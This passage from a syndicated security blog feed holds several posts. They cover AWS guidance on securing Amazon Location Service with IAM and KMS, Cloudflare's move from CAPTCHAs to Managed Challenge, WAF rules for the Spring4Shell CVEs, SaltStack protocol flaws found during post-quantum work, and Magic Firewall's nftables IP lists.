
The action can be found on GitHub Marketplace and in your repository’s Actions tab under the Security heading. It is available for all public repositories, as well as private repositories that have Github Advanced Security licensed.

We’re continuously improving the experience

While we’re currently in public beta, we’ll be adding functionality for you to have more control over what causes the action to fail and can set criteria on the vulnerability severity, license type, or other factors We’re also improving how failed action runs are surfaced in the UI and increasing flexibility around when it’s executed.

If you have feedback or questions

We’re very keen to hear any and all feedback! Pop into the feedback discussion, and let us know how the new action is working for you, and how you’d like to see it grow.

For more information, visit the action and the documentation.

Best practices: Securing your Amazon Location Service resources

Post Syndicated from Dave Bailey original https://aws.amazon.com/blogs/security/best-practices-securing-your-amazon-location-service-resources/

Location data is subjected to heavy scrutiny by security experts. Knowing the current position of a person, vehicle, or asset can provide industries with many benefits, whether to understand where a current delivery is, how many people are inside a venue, or to optimize routing for a fleet of vehicles. This blog post explains how Amazon Web Services (AWS) helps keep location data secured in transit and at rest, and how you can leverage additional security features to help keep information safe and compliant.

The General Data Protection Regulation (GDPR) defines personal data as “any information relating to an identified or identifiable natural person (…) such as a name, an identification number, location data, an online identifier or to one or more factors specific to the physical, physiological, genetic, mental, economic, cultural or social identity of that natural person.” Also, many companies wish to improve transparency to users, making it explicit when a particular application wants to not only track their position and data, but also to share that information with other apps and websites. Your organization needs to adapt to these changes quickly to maintain a secure stance in a competitive environment.

On June 1, 2021, AWS made Amazon Location Service generally available to customers. With Amazon Location, you can build applications that provide maps and points of interest, convert street addresses into geographic coordinates, calculate routes, track resources, and invoke actions based on location. The service enables you to access location data with developer tools and to move your applications to production faster with monitoring and management capabilities.

In this blog post, we will show you the features that Amazon Location provides out of the box to keep your data safe, along with best practices that you can follow to reach the level of security that your organization strives to accomplish.

Data control and data rights

Amazon Location relies on global trusted providers Esri and HERE Technologies to provide high-quality location data to customers. Features like maps, places, and routes are provided by these AWS Partners so solutions can have data that is not only accurate but constantly updated.

AWS anonymizes and encrypts location data at rest and during its transmission to partner systems. In parallel, third parties cannot sell your data or use it for advertising purposes, following our service terms. This helps you shield sensitive information, protect user privacy, and reduce organizational compliance risks. To learn more, see the Amazon Location Data Security and Control documentation.

Integrations

Operationalizing location-based solutions can be daunting. It’s not just necessary to build the solution, but also to integrate it with the rest of your applications that are built in AWS. Amazon Location facilitates this process from a security perspective by integrating with services that expedite the development process, enhancing the security aspects of the solution.

Encryption

Amazon Location uses AWS owned keys by default to automatically encrypt personally identifiable data. AWS owned keys are a collection of AWS Key Management Service (AWS KMS) keys that an AWS service owns and manages for use in multiple AWS accounts. Although AWS owned keys are not in your AWS account, Amazon Location can use the associated AWS owned keys to protect the resources in your account.

If customers choose to use their own keys, they can benefit from AWS KMS to store their own encryption keys and use them to add a second layer of encryption to geofencing and tracking data.

Authentication and authorization

Amazon Location also integrates with AWS Identity and Access Management (IAM), so that you can use its identity-based policies to specify allowed or denied actions and resources, as well as the conditions under which actions are allowed or denied on Amazon Location. Also, for actions that require unauthenticated access, you can use unauthenticated IAM roles.

As an extension to IAM, Amazon Cognito can be an option if you need to integrate your solution with a front-end client that authenticates users with its own process. In this case, you can use Cognito to handle the authentication, authorization, and user management for you. You can use Cognito unauthenticated identity pools with Amazon Location as a way for applications to retrieve temporary, scoped-down AWS credentials. To learn more about setting up Cognito with Amazon Location, see the blog post Add a map to your webpage with Amazon Location Service.

Limit the scope of your unauthenticated roles to a domain

When you are building an application that allows users to perform actions such as retrieving map tiles, searching for points of interest, updating device positions, and calculating routes without needing them to be authenticated, you can make use of unauthenticated roles.

When using unauthenticated roles to access Amazon Location resources, you can add an extra condition to limit resource access to an HTTP referer that you specify in the policy. The aws:referer request context value is provided by the caller in an HTTP header, and it is included in a web browser request.

The following is an example of a policy that allows access to a Map resource by using the aws:referer condition, but only if the request comes from the domain example.com.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "MapsReadOnly",
      "Effect": "Allow",
      "Action": [
        "geo:GetMapStyleDescriptor",
        "geo:GetMapGlyphs",
        "geo:GetMapSprites",
        "geo:GetMapTile"
      ],
      "Resource": "arn:aws:geo:us-west-2:111122223333:map/MyMap",
      "Condition": {
        "StringLike": {
          "aws:Referer": "https://www.example.com/*"
        }
      }
    }
  ]
}

To learn more about aws:referer and other global conditions, see AWS global condition context keys.

Encrypt tracker and geofence information using customer managed keys with AWS KMS

When you create your tracker and geofence collection resources, you have the option to use a symmetric customer managed key to add a second layer of encryption to geofencing and tracking data. Because you have full control of this key, you can establish and maintain your own IAM policies, manage key rotation, and schedule keys for deletion.

After you create your resources with customer managed keys, the geometry of your geofences and all positions associated to a tracked device will have two layers of encryption. In the next sections, you will see how to create a key and use it to encrypt your own data.

Create an AWS KMS symmetric key

First, you need to create a key policy that will limit the AWS KMS key to allow access to principals authorized to use Amazon Location and to principals authorized to manage the key. For more information about specifying permissions in a policy, see the AWS KMS Developer Guide.

To create the key policy

Create a JSON policy file by using the following policy as a reference. This key policy allows Amazon Location to grant access to your KMS key only when it is called from your AWS account. This works by combining the kms:ViaService and kms:CallerAccount conditions. In the following policy, replace us-west-2 with your AWS Region of choice, and the kms:CallerAccount value with your AWS account ID. Adjust the KMS Key Administrators statement to reflect your actual key administrators’ principals, including yourself. For details on how to use the Principal element, see the AWS JSON policy elements documentation.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "Amazon Location",
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": [
        "kms:DescribeKey",
        "kms:CreateGrant"
      ],
      "Resource": "*",
      "Condition": {
        "StringEquals": {
          "kms:ViaService": "geo.us-west-2.amazonaws.com",
          "kms:CallerAccount": "111122223333"
        }
      }
    },
    {
      "Sid": "Allow access for Key Administrators",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111122223333:user/KMSKeyAdmin"
      },
      "Action": [
        "kms:Create*",
        "kms:Describe*",
        "kms:Enable*",
        "kms:List*",
        "kms:Put*",
        "kms:Update*",
        "kms:Revoke*",
        "kms:Disable*",
        "kms:Get*",
        "kms:Delete*",
        "kms:TagResource",
        "kms:UntagResource",
        "kms:ScheduleKeyDeletion",
        "kms:CancelKeyDeletion"
      ],
      "Resource": "*"
    }
  ]
}

For the next steps, you will use the AWS Command Line Interface (AWS CLI). Make sure to have the latest version installed by following the AWS CLI documentation.

Tip: AWS CLI will consider the Region you defined as the default during the configuration steps, but you can override this configuration by adding –region <your region> at the end of each command line in the following command. Also, make sure that your user has the appropriate permissions to perform those actions.

To create the symmetric key

Now, create a symmetric key on AWS KMS by running the create-key command and passing the policy file that you created in the previous step.

aws kms create-key –policy file://<your JSON policy file>

Alternatively, you can create the symmetric key using the AWS KMS console with the preceding key policy.

After running the command, you should see the following output. Take note of the KeyId value.

{
  "KeyMetadata": {
    "Origin": "AWS_KMS",
    "KeyId": "1234abcd-12ab-34cd-56ef-1234567890ab",
    "Description": "",
    "KeyManager": "CUSTOMER",
    "Enabled": true,
    "CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
    "KeyUsage": "ENCRYPT_DECRYPT",
    "KeyState": "Enabled",
    "CreationDate": 1502910355.475,
    "Arn": "arn:aws:kms:us-west-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab",
    "AWSAccountId": "111122223333",
    "MultiRegion": false
    "EncryptionAlgorithms": [
      "SYMMETRIC_DEFAULT"
    ],
  }
}

Create an Amazon Location tracker and geofence collection resources

To create an Amazon Location tracker resource that uses AWS KMS for a second layer of encryption, run the following command, passing the key ID from the previous step.

aws location \
	create-tracker \
	--tracker-name "MySecureTracker" \
	--kms-key-id "1234abcd-12ab-34cd-56ef-1234567890ab"

Here is the output from this command.

{
    "CreateTime": "2021-07-15T04:54:12.913000+00:00",
    "TrackerArn": "arn:aws:geo:us-west-2:111122223333:tracker/MySecureTracker",
    "TrackerName": "MySecureTracker"
}

Similarly, to create a geofence collection by using your own KMS symmetric keys, run the following command, also modifying the key ID.

aws location \
	create-geofence-collection \
	--collection-name "MySecureGeofenceCollection" \
	--kms-key-id "1234abcd-12ab-34cd-56ef-1234567890ab"

Here is the output from this command.

{
    "CreateTime": "2021-07-15T04:54:12.913000+00:00",
    "TrackerArn": "arn:aws:geo:us-west-2:111122223333:geofence-collection/MySecureGeoCollection",
    "TrackerName": "MySecureGeoCollection"
}

By following these steps, you have added a second layer of encryption to your geofence collection and tracker.

Data retention best practices

Trackers and geofence collections are stored and never leave your AWS account without your permission, but they have different lifecycles on Amazon Location.

Trackers store the positions of devices and assets that are tracked in a longitude/latitude format. These positions are stored for 30 days by the service before being automatically deleted. If needed for historical purposes, you can transfer this data to another data storage layer and apply the proper security measures based on the shared responsibility model.

Geofence collections store the geometries you provide until you explicitly choose to delete them, so you can use encryption with AWS managed keys or your own keys to keep them for as long as needed.

Asset tracking and location storage best practices

After a tracker is created, you can start sending location updates by using the Amazon Location front-end SDKs or by calling the BatchUpdateDevicePosition API. In both cases, at a minimum, you need to provide the latitude and longitude, the time when the device was in that position, and a device-unique identifier that represents the asset being tracked.

Protecting device IDs

This device ID can be any string of your choice, so you should apply measures to prevent certain IDs from being used. Some examples of what to avoid include:

  • First and last names
  • Facility names
  • Documents, such as driver’s licenses or social security numbers
  • Emails
  • Addresses
  • Telephone numbers

Latitude and longitude precision

Latitude and longitude coordinates convey precision in degrees, presented as decimals, with each decimal place representing a different measure of distance (when measured at the equator).

Amazon Location supports up to six decimal places of precision (0.000001), which is equal to approximately 11 cm or 4.4 inches at the equator. You can limit the number of decimal places in the latitude and longitude pair that is sent to the tracker based on the precision required, increasing the location range and providing extra privacy to users.

Figure 1 shows a latitude and longitude pair, with the level of detail associated to decimals places.

Figure 1: Geolocation decimal precision details

Figure 1: Geolocation decimal precision details

Position filtering

Amazon Location introduced position filtering as an option to trackers that enables cost reduction and reduces jitter from inaccurate device location updates.

  • DistanceBased filtering ignores location updates wherein devices have moved less than 30 meters (98.4 ft).
  • TimeBased filtering evaluates every location update against linked geofence collections, but not every location update is stored. If your update frequency is more often than 30 seconds, then only one update per 30 seconds is stored for each unique device ID.
  • AccuracyBased filtering ignores location updates if the distance moved was less than the measured accuracy provided by the device.

By using filtering options, you can reduce the number of location updates that are sent and stored, thus reducing the level of location detail provided and increasing the level of privacy.

Logging and monitoring

Amazon Location integrates with AWS services that provide the observability needed to help you comply with your organization’s security standards.

To record all actions that were taken by users, roles, or AWS services that access Amazon Location, consider using AWS CloudTrail. CloudTrail provides information on who is accessing your resources, detailing the account ID, principal ID, source IP address, timestamp, and more. Moreover, Amazon CloudWatch helps you collect and analyze metrics related to your Amazon Location resources. CloudWatch also allows you to create alarms based on pre-defined thresholds of call counts. These alarms can create notifications through Amazon Simple Notification Service (Amazon SNS) to automatically alert teams responsible for investigating abnormalities.

Conclusion

At AWS, security is our top priority. Here, security and compliance is a shared responsibility between AWS and the customer, where AWS is responsible for protecting the infrastructure that runs all of the services offered in the AWS Cloud. The customer assumes the responsibility to perform all of the necessary security configurations to the solutions they are building on top of our infrastructure.

In this blog post, you’ve learned the controls and guardrails that Amazon Location provides out of the box to help provide data privacy and data protection to our customers. You also learned about the other mechanisms you can use to enhance your security posture.

Start building your own secure geolocation solutions by following the Amazon Location Developer Guide and learn more about how the service handles security by reading the security topics in the guide.

 
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this blog post, start a new thread on Amazon Location Service forum or contact AWS Support.

Want more AWS Security news? Follow us on Twitter.

Rafael Leandro Junior

Rafael Leandro, Junior

Rafael Leandro, Junior, is a senior global solutions architect who currently focuses on the consumer packaged goods and transportation industries. He helps large global customers on their journeys with AWS.

David Bailey

David Bailey

David Bailey is a senior security consultant who helps AWS customers achieve their cloud security goals. He has a passion for building new technologies and providing mentorship for others.

The end of the road for Cloudflare CAPTCHAs

Post Syndicated from Reid Tatoris original https://blog.cloudflare.com/end-cloudflare-captcha/

The end of the road for Cloudflare CAPTCHAs

The end of the road for Cloudflare CAPTCHAs

There is no point in rehashing the fact that CAPTCHA provides a terrible user experience. It’s been discussed in detail before on this blog, and countless times elsewhere. One of the creators of the CAPTCHA has publicly lamented that he “unwittingly created a system that was frittering away, in ten-second increments, millions of hours of a most precious resource: human brain cycles.” We don’t like them, and you don’t like them.

So we decided we’re going to stop using CAPTCHAs. Using an iterative platform approach, we have already reduced the number of CAPTCHAs we choose to serve by 91% over the past year.

Before we talk about how we did it, and how you can help, let’s first start with a simple question.

Why in the world is CAPTCHA still used anyway?

If everyone agrees CAPTCHA is so bad, if there have been calls to get rid of it for 15 years, if the creator regrets creating it, why is it still widely used?

The frustrating truth is that CAPTCHA remains an effective tool for differentiating real human users from bots despite the existence of CAPTCHA-solving services. Of course, this comes with a huge trade off in terms of usability, but generally the alternatives to CAPTCHA are blocking or allowing traffic, which will inherently increase either false positives or false negatives. With a choice between increased errors and a poor user experience (CAPTCHA), many sites choose CAPTCHA.

CAPTCHAs are also a safe choice because so many other sites use them. They delegate abuse response to a third party, and remove the risk from the website with a simple integration. Using the most common solution will rarely get you into trouble. Plug, play, forget.

Lastly, CAPTCHA is useful because it has a long history of a known and stable baseline. We’ve tracked a metric called CAPTCHA (or Challenge) Solve Rate for many years. CAPTCHA solve rate is the number of CAPTCHAs solved, divided by the number of page loads. For our purposes both failing or not attempting to solve the CAPTCHA count as a failure, since in either case a user cannot access the content they want to. We find this metric to typically be stable for any particular website. That is, if the solve rate is 1%, it tends to remain at 1% over time. We also find that any change in solve rate – up or down – is a strong indicator of an attack in progress. Customers can monitor the solve rate and create alerts to notify them when it changes, then investigate what might be happening.

Many alternatives to CAPTCHA have been tried, including our own Cryptographic Attestation. However, to date, none have seen the amount of widespread adoption of CAPTCHAs. We believe attempting to replace CAPTCHA with a single alternative is the main reason why. When you replace CAPTCHA, you lose the stable history of the solve rate, and making decisions becomes more difficult. If you switch from deciphering text to picking images, you will get vastly different results. How do you know if those results are good or bad? So, we took a different approach.

Many solutions, not one

Rather than try to unilaterally deprecate and replace CAPTCHA with a single alternative, we built a platform to test many alternatives and see which had the best potential to replace CAPTCHA. We call this Cloudflare Managed Challenge.

The end of the road for Cloudflare CAPTCHAs

Managed Challenge is a smarter solution than CAPTCHA. It defers the decision about whether to serve a visual puzzle to a later point in the flow after more information is available from the browser. Previously, a Cloudflare customer could only choose between either a CAPTCHA or JavaScript Challenge as the action of a security or firewall rule. Now, the Managed Challenge option will decide to show a visual puzzle or other means of proving humanness to visitors based on the client behavior exhibited during a challenge and based on the telemetry we receive from the visitor. A customer simply tells us, “I want you (Cloudflare) to take appropriate actions to challenge this type of traffic as you see necessary.

With Managed Challenge, we adapt the actual challenge outcome to the individual visitor/browser. As a result, we can fine-tune the difficulty of the challenge itself and avoid showing visual puzzles to more than 90% of human requests, while at the same time presenting harder challenges to visitors that exhibit non-human behaviors.

When a visitor encounters a Managed Challenge, we first run a series of small non-interactive JavaScript challenges gathering more signals about the visitor/browser environment. This means we deploy in-browser detections and challenges at the time the request is made. Challenges are selected based on what characteristics the visitor emits and based on the initial information we have about the visitor. Those challenges include, but are not limited to, proof-of-work, proof-of-space, probing for web APIs, and various challenges for detecting browser-quirks and human behavior.

They also include machine learning models that detect common features of end visitors who were able to pass a CAPTCHA before. The computational hardness of those initial challenges may vary by visitor, but is targeted to run fast. Managed Challenge is also integrated into the Cloudflare Bot Management and Super Bot Fight Mode systems by consuming signals and data from the bot detections.

After our non-interactive challenges have been run, we evaluate the gathered signals. If by the combination of those signals we are confident that the visitor is likely human, no further action is taken, and the visitor is redirected to the destined page without any interaction required. However, in some cases, if the signal is weak, we present a visual puzzle to the visitor to prove their humanness. In the context of Managed Challenge, we’re also experimenting with other privacy-preserving means of attesting humanness, to continue reducing the portion of time that Managed Challenge uses a visual puzzle step.

We started testing Managed Challenge last year, and initially, we chose from a rotating subset of challenges, one of them being CAPTCHA. At the start, CAPTCHA was still used in the vast majority of cases. We compared the solve rate for the new challenge in question, with the existing, stable solve rate for CAPTCHA. We thus used CAPTCHA solve rate as a goal to work towards as we improved our CAPTCHA alternatives, getting better and better over time. The challenge platform allows our engineers to easily create, deploy, and test new types of challenges without impacting customers. When a challenge turns out to not be useful, we simply deprecate it. When it proves to be useful, we increase how often it is used. In order to preserve ground-truth, we also randomly choose a small subset of visitors to always solve a visual puzzle to validate our signals.

Managed Challenge performs better than CAPTCHA

The Challenge Platform now has the same stable solve rate as previously used CAPTCHAs.

The end of the road for Cloudflare CAPTCHAs

Using an iterative platform approach, we have reduced the number of CAPTCHAs we serve by 91%. This is only the start. By the end of the year, we will reduce our use of CAPTCHA as a challenge to less than 1%. By skipping the visual puzzle step for almost all visitors, we are able to reduce the visitor time spent in a challenge from an average of 32 seconds to an average of just one second to run our non-interactive challenges. We also see churn improvements: our telemetry indicates that visitors with human properties are 31% less likely to abandon a Managed Challenge than on the traditional CAPTCHA action.

Today, the Managed Challenge platform rotates between many challenges. A Managed Challenge instance consists of many sub-challenges: some of them are established and effective, whereas others are new challenges we are experimenting with. All of them are much, much faster and easier for humans to complete than CAPTCHA, and almost always require no interaction from the visitor.

Managed Challenge replaces CAPTCHA for Cloudflare

We have now deployed Managed Challenge across the entire Cloudflare network. Any time we show a CAPTCHA to a visitor, it’s via the Managed Challenge platform, and only as a benchmark to confirm our other challenges are performing as well.

All Cloudflare customers can now choose Managed Challenge as a response option to any Firewall rule instead of CAPTCHA. We’ve also updated our dashboard to encourage all Cloudflare customers to make this choice.

The end of the road for Cloudflare CAPTCHAs

You’ll notice that we changed the name of the CAPTCHA option to ‘Legacy CAPTCHA’. This more accurately describes what CAPTCHA is: an outdated tool that we don’t think people should use. As a result, the usage of CAPTCHA across the Cloudflare network has dropped significantly, and usage of managed challenge has increased dramatically.

The end of the road for Cloudflare CAPTCHAs

As noted above, today CAPTCHA represents 9% of Managed Challenge solves (light blue), but that number will decrease to less than 1% by the end of the year. You’ll also see the gray bar above, which shows when our customers have chosen to show a CAPTCHA as a response to a Firewall rule triggering. We want that number to go to zero, but the good news is that 63% of customers now choose Managed Challenge rather than CAPTCHA when they create a Firewall rule with a challenge response action.

The end of the road for Cloudflare CAPTCHAs

We expect this number to increase further over time.

If you’re using the Cloudflare WAF, log into the Dashboard today and look at all of your Firewall rules. If any of your rules are using “Legacy CAPTCHA” as a response, please change it now! Select the “Managed Challenge” response option instead. You’ll give your users a better experience, while maintaining the same level of protection you have today. If you’re not currently a Cloudflare customer, stay tuned for ways you can reduce your own use of CAPTCHA.

WAF mitigations for Spring4Shell

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/waf-mitigations-sping4shell/

WAF mitigations for Spring4Shell

WAF mitigations for Spring4Shell

A set of high profile vulnerabilities have been identified affecting the popular Java Spring Framework and related software components – generally being referred to as Spring4Shell.

Four CVEs have been released so far and are being actively updated as new information emerges. These vulnerabilities can result, in the worst case, in full remote code execution (RCE) compromise:

Customers using Java Spring and related software components, such as the Spring Cloud Gateway, should immediately review their software and update to the latest versions by following the official Spring project guidance.

The Cloudflare WAF team is actively monitoring these CVEs and has already deployed a number of new managed mitigation rules. Customers should review the rules listed below to ensure they are enabled while also patching the underlying Java Spring components.

CVE-2022-22947

A new rule has been developed and deployed for this CVE with an emergency release on March 29:

Managed Rule Spring – CVE:CVE-2022-22947

  • WAF rule ID: e777f95584ba429796856007fbe6c869
  • Legacy rule ID: 100522

Note that the above rule is disabled by default and may cause some false positives. We advise customers to review rule matches or to deploy the rule with a LOG action before switching to BLOCK.

CVE-2022-22950

Currently, available PoCs are blocked by the following rule:

Managed Rule PHP – Code Injection

  • WAF rule ID: 55b100786189495c93744db0e1efdffb
  • Legacy rule ID: PHP100011

CVE-2022-22963

Currently, available PoCs are blocked by the following rule:

Managed Rule Plone – Dangerous File Extension

  • WAF rule ID: aa3411d5505b4895b547d68950a28587
  • Legacy WAF ID: PLONE0001

We also deployed a new rule via an emergency release on March 31 (today at time of writing) to cover additional variations attempting to exploit this vulnerability:

Managed Rule Spring – Code Injection

  • WAF rule ID: d58ebf5351d843d3a39a4480f2cc4e84
  • Legacy WAF ID: 100524

Note that the newly released rule is disabled by default and may cause some false positives. We advise customers to review rule matches or to deploy the rule with a LOG action before switching to BLOCK.

Additionally, customers can receive protection against this CVE by deploying the Cloudflare OWASP Core Ruleset with default or better settings on our new WAF. Customers using our legacy WAF will have to configure a high OWASP sensitivity level.

CVE-2022-22965

We are currently investigating this recent CVE and will provide an update to our Managed Ruleset as soon as possible if an applicable mitigation strategy or bypass is found. Please review and monitor our public facing change log.

Future-proofing SaltStack

Post Syndicated from Lenka Mareková original https://blog.cloudflare.com/future-proofing-saltstack/

Future-proofing SaltStack

Future-proofing SaltStack

At Cloudflare, we are preparing the Internet and our infrastructure for the arrival of quantum computers. A sufficiently large and stable quantum computer will easily break commonly deployed cryptography such as RSA. Luckily there is a solution: we can swap out the vulnerable algorithms with so-called post-quantum algorithms that are believed to be secure even against quantum computers. For a particular system, this means that we first need to figure out which cryptography is used, for what purpose, and under which (performance) constraints. Most systems use the TLS protocol in a standard way, and there a post-quantum upgrade is routine. However, some systems such as SaltStack, the focus of this blog post, are more interesting. This blog post chronicles our path of making SaltStack quantum-secure, so welcome to this adventure: this secret extra post-quantum blog post!

SaltStack, or simply Salt, is an open-source infrastructure management tool used by many organizations. At Cloudflare, we rely on Salt for provisioning and automation, and it has allowed us to grow our infrastructure quickly.

Salt uses a bespoke cryptographic protocol to secure its communication. Thus, the first step to a post-quantum Salt was to examine what the protocol was actually doing. In the process we discovered a number of security vulnerabilities (CVE-2022-22934, CVE-2022-22935, CVE-2022-22936). This blogpost chronicles the investigation, our findings, and how we are helping secure Salt now and in the Quantum future.

Cryptography in Salt

Let’s start with a high-level overview of Salt.

The main agents in a Salt system are servers and clients (referred to as masters and minions in the Salt documentation). A server is the central control point for a number of clients, which can be in the tens of thousands: it can issue a command to the entire fleet, provision client machines with different characteristics, collect reports on jobs running on each machine, and much more. Depending on the architecture, there can be multiple servers managing the same fleet of clients. This is what makes Salt great, as it helps the management of complex infrastructure.

By default, the communication between a server and a client happens over ZeroMQ on top of TCP though there is an experimental option to switch to a custom transport directly on TCP. The cryptographic protocol is largely the same for both transports. The experimental TCP transport has an option to enable TLS which does not replace the custom protocol but wraps it in server-authenticated TLS. More about that later on.

The custom protocol relies on a setup phase in which each server and each client has its own long-term RSA-2048 keypair. On the surface similar to TLS, Salt defines a handshake, or key exchange protocol, that generates a shared secret, and a record protocol which uses this secret with symmetric encryption (the symmetric channel).

Key exchange protocol

In its basic form, the key exchange (or handshake) protocol is an RSA key exchange in which the server chooses the secret and encrypts it to the client’s public key. The exact form of the protocol then depends on whether either party already knows the other party’s long-term public key, since certificates (like in TLS) are not used. By default, clients trust the server’s public key on first use, and servers only trust the client’s public key after it has been accepted by an out-of-band mechanism. The shared secret is shared among the entire fleet of clients, so it is not specific to a particular server and client pair. This allows the server to encrypt a broadcast message only once. We will come back to this performance trade-off later on.

Future-proofing SaltStack
Salt key exchange (as of version 3004) under default settings, showing the first connection between the given server and client.

Symmetric channel

The shared secret is used as the key for encryption. Most of the messages between a server and a client are secured in an Encrypt-then-MAC fashion, with AES-192 in CBC mode with SHA-256 for HMAC. For certain more sensitive messages, variations on this protocol are used to add more security. For example, commands are signed using the server’s long-term secret key, and “pillar data” (deemed more sensitive) is encrypted only to a particular client using a freshly generated secret key.

Future-proofing SaltStack
Symmetric channel in Salt (as of version 3004).

Security vulnerabilities

We found that the protocol variation used for pillar messages contains a flaw. As shown in the diagram below, a monster-in-the-middle attacker (MitM) that sits between a server and a client can substitute arbitrary “pillar data” to the client. It needs to know the client’s public key, but that is easy to find since clients broadcast it as part of their key exchange request. The initial key exchange can be observed, or one could be triggered on-demand using a specially crafted message. This MitM was possible because neither the newly generated key nor the actual payload were authenticated as coming from the server. This matters because “pillar data” can include anything from specifying packages to be installed to credentials and cryptographic keys. Thus, it is possible that this flaw could allow an attacker to gain access to the vulnerable client machine.

Future-proofing SaltStack
Illustration of the monster-in-the-middle attack, CVE-2022-22934.

We reported the issue to Salt November 5, 2021, which assigned CVE-2022-22934 to it. Earlier this week, on March 28, 2022, Salt released a patch that adds a signature of the server on the pillar message to prevent the attack.

There were several other smaller issues we found. Messages could be replayed to the same or a different client. This could allow a file intended for one client, to be served to a different one, perhaps aiding lateral movement. This is CVE-2022-22936 and has been patched by adding the name of the addressed client, a nonce and a signature to messages.

Finally, there were some messages which could be manipulated to cause the client to crash.  This is CVE-2022-22935 and was patched similarly by adding the addressee, nonce and signature.

If you are running Salt, please update as soon as possible to either 3002.8, 3003.4 or 3004.1.

Moving forward

These patches add signatures to almost every single message. The decision to have a single shared secret was a performance trade-off: only a single encryption is required to broadcast a message. As signatures are computationally much more expensive than symmetric encryption, this trade-off didn’t work out that well. It’s better to switch to a separate shared key per client, so that we don’t need to add a signature on every separate message. In effect, we are creating a single long-lived mutually-authenticated channel per client. But then we are getting very close to what mutually authenticated TLS (mTLS) can provide. What would that look like? Hold that thought for a moment: we will return to it below.

We got sidetracked from our original question: what does this all mean for making Salt post-quantum secure? One thing to take away about post-quantum cryptography today is that signatures are much larger: Dilithium2, for instance, weighs in at 2.4 kB compared to 256 bytes for an RSA-2048 signature. So ironically, patching these vulnerabilities has made our job more difficult as there are many more signatures. Thus, also for our post-quantum goal, mTLS seems very attractive. Not the least because there are post-quantum TLS stacks ready to go.

Finally, as the security properties of  mTLS are well understood, it will be much easier to add new messages and functionality to Salt’s protocol. With the current complex protocol, any change is much harder to judge with confidence.

An mTLS-based transport

So what would such an mTLS-based protocol for Salt look like? Clients would pin the server certificate and the server would pin the client certificates. Thus, we wouldn’t have any traditional public key infrastructure (PKI). This matches up nicely with how Salt deals with keys currently. This allows clients to establish long-lived connections with their server and be sure that all data exchanged between them is confidential, mutually authenticated and has forward secrecy. This mitigates replays, swapping of messages, reflection attacks or subtle denial of service pathways for free.

We tested this idea by implementing a third transport using WebSocket over mTLS (WSS). As mentioned before, Salt already offers an option to use TLS with the TCP transport, but it doesn’t authenticate clients and creates a new TCP connection for every client request which leads to a multitude of unnecessary TLS handshakes. Internally, Salt has been architected to work with new connections for each request, so our proof of concept required some laborious retooling.

Our findings show promise that there would be no significant losses and potentially some improvements when it comes to performance at scale. In our preliminary experiments with a single server handling a thousand clients, there was no difference in several metrics compared to the default ZeroMQ transport. Resource-intensive operations such as the fetching of pillar and state data resulted, in our experiment, in lower CPU usage in the mTLS transport. Enabling long-lived connections reduced the amount of data transmitted between the clients and the server, in some cases, significantly so.

We have shared our preliminary results with Salt, and we are working together to add an mTLS-based transport upstream. Stay tuned!

Conclusion

We had a look at how to make Salt post-quantum secure. While doing so, we found and helped fix several issues. We see a clear path forward to a future post-quantum Salt based on mTLS. Salt is but one system: we will continue our work, checking system-by-system, collaborating with vendors to bring post-quantum into the present.

With thanks to Bas and Sofía for their help on the project.

Optimizing Magic Firewall’s IP lists

Post Syndicated from Jordan Griege original https://blog.cloudflare.com/magic-firewall-optimizing-ip-lists/

Optimizing Magic Firewall’s IP lists

Optimizing Magic Firewall’s IP lists

Magic Firewall is Cloudflare’s replacement for network-level firewall hardware. It evaluates gigabits of traffic every second against user-defined rules that can include millions of IP addresses. Writing a firewall rule for each IP address is cumbersome and verbose, so we have been building out support for various IP lists in Magic Firewall—essentially named groups that make the rules easier to read and write. Some users want to reject packets based on our growing threat intelligence of bad actors, while others know the exact set of IPs they want to match, which Magic Firewall supports via the same API as Cloudflare’s WAF.

With all those IPs, the system was using more of our memory budget than we’d like. To understand why, we need to first peek behind the curtain of our magic.

Life inside a network namespace

Magic Transit and Magic WAN enable Cloudflare to route layer 3 traffic, and they are the front door for Magic Firewall. We have previously written about how Magic Transit uses network namespaces to route packets and isolate customer configuration. Magic Firewall operates inside these namespaces, using nftables as the primary implementation of packet filtering.

Optimizing Magic Firewall’s IP lists

When a user makes an API request to configure their firewall, a daemon running on every server detects the change and makes the corresponding changes to nftables. Because nftables configuration is stored within the namespace, each user’s firewall rules are isolated from the next. Every Cloudflare server routes traffic for all of our customers, so it’s important that the firewall only applies a customer’s rules to their own traffic.

Using our existing technologies, we built IP lists using nftables sets. In practice, this means that the wirefilter expression

ip.geoip.country == “US”

is implemented as

table ip mfw {
	set geoip.US {
		typeof ip saddr
		elements = { 192.0.2.0, … }
	}
	chain input {
		ip saddr @geoip.US block
	}
}

This design for the feature made it very easy to extend our wirefilter syntax so that users could write rules using all the different IP lists we support.

Scaling to many customers

We chose this design since sets fit easily into our existing use of nftables. We shipped quickly with just a few, relatively small lists to a handful of customers. This approach worked well at first, but we eventually started to observe a dramatic increase in our system’s memory use. It’s common practice for our team to enable a new feature for just a few customers at first. Here’s what we observed as those customers started using IP lists:

Optimizing Magic Firewall’s IP lists

It turns out you can’t store millions of IPs in the kernel without someone noticing, but the real problem is that we pay that cost for each customer that uses them. Each network namespace gets a complete copy of all the lists that its rules reference. Just to make it perfectly clear, if 10 users have a rule that uses the anonymizer list, then a server has 10 copies of that list stored in the kernel. Yikes!

And it isn’t just the storage of these IPs that caused alarm; the sheer size of the nftables configuration causes nft (the command-line program for configuring nftables) to use quite a bit of compute power.

Optimizing Magic Firewall’s IP lists

Can you guess when the nftables updates take place?  Now the CPU usage wasn’t particularly problematic, as the service is already quite lean. However, those spikes also create competition with other services that heavily use netlink sockets. At one point, a monitoring alert for another service started firing for high CPU, and a fellow development team went through the incident process only to realize our system was the primary contributor to the problem. They made use of the -terse flag to prevent nft from wasting precious time rendering huge lists of IPs, but degrading another team’s service was a harsh way to learn that lesson.

We put quite a bit of effort into working around this problem. We tried doing incremental updates of the sets, only adding or deleting the elements that had changed since the last update. It was helpful sometimes, but the complexity ended up not being worth the small savings. Through a lot of profiling, we found that splitting an update across multiple statements improved the situation some. This means we changed

